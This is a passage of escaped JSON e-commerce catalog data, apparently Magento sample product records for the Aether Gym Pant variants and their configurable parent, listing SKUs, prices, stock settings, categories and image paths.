:\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Brown\"},\"813\":{\"sku\":\"MP11-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -33-Green\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"814\":{\"sku\":\"MP11-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -34-Blue\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"815\":{\"sku\":\"MP11-34-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -34-Brown\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-34-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Brown\"},\"816\":{\"sku\":\"MP11-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -34-Green\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"817\":{\"sku\":\"MP11-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -36-Blue\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"818\":{\"sku\":\"MP11-36-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -36-Brown\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-36-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Brown\"},\"819\":{\"sku\":\"MP11-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant -36-Green\",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aether-gym-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"820\":{\"sku\":\"MP11\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Aether Gym Pant \",\"description\":\"<p>The Aether Gym Pant is built for the studio, but adapts perfectly well to outdoor and gym environs too. With lightweight stretch fabric and water-repellent exterior, the Aether is ready for all comers.<\\/p>\\n<p>&bull; Pants\\/shorts convertible.<br \\/>&bull; Lightweight moisture wicking. <br \\/>&bull; Water repellent.<br \\/>&bull; Belted waist.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Sweatpants|Track Pants,material=Cocona&reg; performance fabric|Spandex|Wool,pattern=Solid,climate=All-weather|Cold|Cool|Indoor|Mild|Rainy|Spring|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP11-32-Blue,size=32,color=Blue|sku=MP11-32-Brown,size=32,color=Brown|sku=MP11-32-Green,size=32,color=Green|sku=MP11-33-Blue,size=33,color=Blue|sku=MP11-33-Brown,size=33,color=Brown|sku=MP11-33-Green,size=33,color=Green|sku=MP11-34-Blue,size=34,color=Blue|sku=MP11-34-Brown,size=34,color=Brown|sku=MP11-34-Green,size=34,color=Green|sku=MP11-36-Blue,size=36,color=Blue|sku=MP11-36-Brown,size=36,color=Brown|sku=MP11-36-Green,size=36,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"image\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp11-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp11-brown_alt1.jpg,\\/m\\/p\\/mp11-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Sweatpants|Track Pants\",\"material\":\"Cocona&reg; performance fabric|Spandex|Wool\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cold|Cool|Indoor|Mild|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"821\":{\"sku\":\"MP12-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cronus Yoga 